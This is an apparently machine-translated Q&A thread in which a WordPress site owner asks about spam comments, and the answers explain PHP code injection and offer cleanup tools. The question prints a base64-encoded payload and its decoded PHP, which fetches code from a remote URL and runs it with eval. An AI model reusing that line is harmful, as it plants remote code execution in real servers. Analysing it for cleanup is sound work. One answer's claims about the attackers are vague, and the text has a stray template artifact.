我今天正在使用wordpress博客我得到了这样的评论。
<!-- unsafe comment zapped --> eval(base64_decode("JGRhdGEgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL3dvcmRwcmVzcy1jb3JlL3VwZGF0ZS1mcmFtZXdvcmsudHh0Iik7ZXZhbCgkZGF0YSk7")); --><!--/mfunc-->
当我使用解码器解码此评论时我得到了
$data = file_get_contents("https://s3.amazonaws.com/wordpress-core/update-framework.txt");eval($data);
我收到很多这样的评论。任何人都可以帮我解决这个问题。它是一个哈克还是它显示了黑客攻击的开始?
答案 0 :(得分:1)
这是一次黑客攻击或至少是一次尝试。他们利用了一个未解决的wordpress漏洞,可以让他们下载和执行代码等等。此类攻击目前在网络上几乎没有公开曝光,如果它来自受过教育的来源,则可能特别讨厌。如果您在服务器端注意到这些类型的代码片段,那么请进行更多研究以确定您是否真的被感染,如果是,那么感染实际上已经消失了多少。我已经看到整个共享托管服务器感染了单个wordpress站点管理员,或者允许通过无知或主动帮助传播这个问题。不幸的是,这个特殊问题目前在网上没有很好的记录,所以你可能需要做一些研究,以确保你的网站没问题。为了帮助你研究,我将澄清这个黑客的术语。
这是一种 PHP Code Injection 攻击,最有可能试图利用wordpress框架中的已知漏洞。它使用Base64编码的PHP代码通过eval()将自身注入到托管服务器上,{{1}}是一种编程语言结构,几乎所有编程语言都包含在PHP中。黑客拥有极其有组织和先进的能力,最近利用这种漏洞对受损的wordpress网站造成了严重破坏,因此在处理此类问题时要格外小心。
答案 1 :(得分:1)
这些建议都没有对我们有用。以下是我们如何在没有停机的情况下从多个wordpress站点中删除恶意代码。
我们遇到了一个问题,我们有多个遗留的wordpress网站共享一个被这种病毒渗透的文件系统。
我们最终编写了一个小的python脚本来遍历我们的文件系统并检测恶意代码。
以下是任何感兴趣的人的代码(注:使用风险自负): https://github.com/michigan-com/eval_scrubber
pip install eval_scrubber
// finds all infected files, will not do anything but READ
python -m eval_scrubber find .
// attempts to remove malicious code from files, potentially dangerous because it WRITEs
python -m eval_scrubber remove .
脚本将扫描文件系统中的恶意内容,并且作为单独的命令,它将尝试删除base64 eval函数。
这实际上是一种临时解决方案,因为此病毒的生成器使用PHP注释导致正则表达式不匹配。我们最终使用auditd来监控哪些文件正在写入我们知道感染的文件:http://www.cyberciti.biz/tips/linux-audit-files-to-see-who-made-changes-to-a-file.html
一旦我们找到病毒的生成器,再做一次eval_scrubber remove,然后我们的问题就解决了。
答案 2 :(得分:0)
我正在寻找一个好的,快速的解决方案。这将帮助您找到哪些文件感染了eval64。然后,您可以在Dreamweaver中使用搜索/替换,并立即从所有文件中删除它。
BUT
有一个索引文件,包含2行代码。那2条线一遍又一遍地注射eval。我忘了它是哪个index.php但是看看文件夹:
尝试使用Dreamweaver在文件中搜索md5。
希望你能解决它。